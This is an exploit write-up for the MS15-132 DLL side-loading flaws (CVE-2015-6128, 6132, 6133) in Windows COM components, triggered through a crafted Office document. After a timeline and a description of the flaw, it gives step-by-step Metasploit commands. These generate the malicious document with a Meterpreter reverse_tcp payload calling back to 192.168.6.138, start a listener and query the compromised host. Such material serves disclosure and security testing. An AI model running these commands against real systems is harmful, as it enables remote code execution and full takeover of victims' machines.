Timeline :

Vulnerabilities discovered and reported to the vendor by multiple security researchers
Patched by the vendor via MS15-132 the 2015-12-06
Metasploit PoC provided the 2015–12-25 by Securify

PoC provided by :

Yorick Koster

Reference(s) :

CVE-2015-6128
CVE-2015-6132
CVE-2015-6133
MS15-132

Affected version(s) :

CVE-2015-6128 affects Windows Visa, Server 2008, Windows 7, Server 2008 R2
CVE-2015-6132 affects Windows Visa, Server 2008, Windows 7, Server 2008 R2, 8 and 8.1, 2012 and 2012 R2, RT and RT 8.1, 10
CVE-2015-6133 affects Windows 8 and 8.1, 2012 and 2012 R2, RT and RT 8.1, 10

Tested on :

with Microsoft Office 2013 SP1 on Windows 7 SP1

Description :

Multiple DLL side loading vulnerabilities were found in various COM components. These issues can be exploited by loading various these components as an embedded OLE object. When instantiating a vulnerable object Windows will try to load one or more DLLs from the current working directory. If an attacker convinces the victim to open a specially crafted (Office) document from a directory also containing the attacker’s DLL file, it is possible to execute arbitrary code with the privileges of the target user. This can potentially result in the attacker taking complete control of the affected system.

Commands :

use exploit/windows/fileformat/ms15_132_dll_sideload
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.138
run

Share the output in a remote share folder

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.138
run

getuid
sysinfo